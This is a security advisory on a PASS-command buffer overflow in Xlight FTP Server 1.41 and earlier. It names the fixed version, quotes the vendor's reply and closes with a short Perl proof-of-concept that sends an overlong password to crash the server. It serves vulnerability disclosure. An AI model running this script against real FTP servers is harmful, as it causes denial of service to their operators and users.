‘Xlight FTP Server PASS Buffer Overflow’
Summary
‘Xlight FTP server is ‘a powerful ftp server with very small program size’. A buffer overflow vulnerability in the product has been found allowing remote attackers to overflow an internal buffer.’
Credit:
‘SecurITeam would like to thank STORM for finding this vulnerability.’
Details
‘Vulnerable systems:
* Xlight FTP Server version 1.41 and prior
Immune systems:
* Xlight FTP Server version 1.45
By sending an overflow long PASS command a local buffer used in Xlight FTP server can be overflowed.
Vendor status:
‘We would like to inform you that we have release a new version of Xlight ftp server 1.45 which includes solution for this buffer overflow problem. Thanks for your alert.
Best regards,
Xlight ftp support
support@xlightftpd.com’
Exploit:
#!/usr/bin/perl
#
# Exploit for Xlight FTP server long PASS vulnerability
#
use IO::Socket;
unless (@ARGV == 1) { die ‘usage: $0 host …’ }
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto => ‘tcp’,
PeerAddr => $host,
PeerPort => ‘ftp(21)’,
);
unless ($remote) { die ‘cannot connect to ftp daemon on $host’ }
$remote->autoflush(1);
print $remote ‘USER anonymousrn’;
sleep(1);
$buf = ‘A’x54; # Min 54, Max 523
print $remote ‘PASS ‘.$buf.’rn’;
sleep(1);
close $remote;’